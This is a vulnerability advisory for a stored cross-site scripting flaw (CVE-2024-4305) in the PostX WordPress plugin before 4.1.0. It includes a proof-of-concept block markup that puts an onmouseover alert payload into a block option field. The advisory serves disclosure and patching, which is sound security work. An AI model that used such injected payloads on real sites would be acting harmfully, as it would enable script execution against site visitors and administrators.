WordPress Plugin Vulnerabilities

PostX < 4.1.0 - Contributor+ Stored XSS

Description

The plugin does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

Proof of Concept

As a contributor, put the below code in a post while in Code Editor mode

<!-- wp:ultimate-post/post-grid-3 {"blockId":"d57ca5","currentPostId":"2198","filterShow":true,"paginationShow":true,"readMore":true,"contentTag":"section","openInTab":true,"headingText":"123","headingURL":"123","headingTag":"h5","titleTag":"h6","metaMinText":"123","metaAuthorPrefix":"123","fallbackImg":{"url":"123","id":99999},"readMoreText":"123","filterText":"ClickMe!","filterMobileText":"\u0022onmouseover='alert(/XSS/)'","loadMoreText":"123"} /-->

The XSS will be triggered when (pre)viewing the post and moving the mouse over the ClickMe! text

Affects Plugins

Plugin icon
ultimate-post
Fixed in 4.1.0

References

CVE
CVE-2024-4305
URL
https://research.cleantalk.org/cve-2024-4305/

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher
Dmitrii Ignatyev
Submitter
Dmitrii Ignatyev
Submitter website
https://www.linkedin.com/in/dmitriy-ignatyev-8a9189267/
Verified
Yes
WPVDB ID
635be98d-4c17-4e75-871f-9794d85a2eb1

Timeline

Publicly Published
2024-05-27 (about 1 months ago)
Added
2024-05-27 (about 1 months ago)
Last Updated
2024-05-27 (about 1 months ago)

Other

Published
Title
Published
2024-06-18
Title
Ultimate Blocks – WordPress Blocks Plugin < 3.1.1 - Authenticated(Contributor+) Stored Cross-Site Scripting via metabox
Published
2014-08-01
Title
SocialGrid 2.3 - inline-admin.js.php default_services Parameter XSS
Published
2014-08-01
Title
WordPress 3.3 - Cross-Site Scripting (XSS)
Published
2022-11-27
Title
Download Manager < 3.2.60 - Reflected XSS
Published
2021-11-01
Title
GenerateBlocks < 1.4.0 - Contributor+ Stored Cross-Site Scripting